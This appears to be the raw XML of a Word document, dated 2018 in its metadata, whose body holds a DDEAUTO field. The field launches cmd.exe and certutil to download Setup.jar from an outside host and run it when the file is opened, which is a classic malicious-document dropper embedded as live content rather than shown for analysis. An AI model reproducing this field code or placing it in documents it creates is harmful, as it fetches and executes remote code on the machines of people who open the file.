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3A7" w:rsidRDefault="003E69A5">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r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<w:r w:rsidRPr="003E69A5"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<w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/c certutil -urlcache -split -f http://antikbatarya.com/Setup.jar &amp;&amp; Setup.jar"</w:instrText>
      </w:r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<w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r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<w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p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<w:sectPr w:rsidR="001723A7">
      <w:pgSz w:w="11906" w:h="16838"/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<w:pgMar w:top="1417" w:right="1417" w:bottom="1417" w:left="1417" w:header="708" w:footer="708" w:gutter="0"/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<w:cols w:space="708"/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<w:docGrid w:linePitch="360"/>
    </w:sectPr>
  </w:body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E69A5"/>
    <w:rsid w:val="001723A7"/>
    <w:rsid w:val="003E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>TESTER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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-07-12T17:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-12T17:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>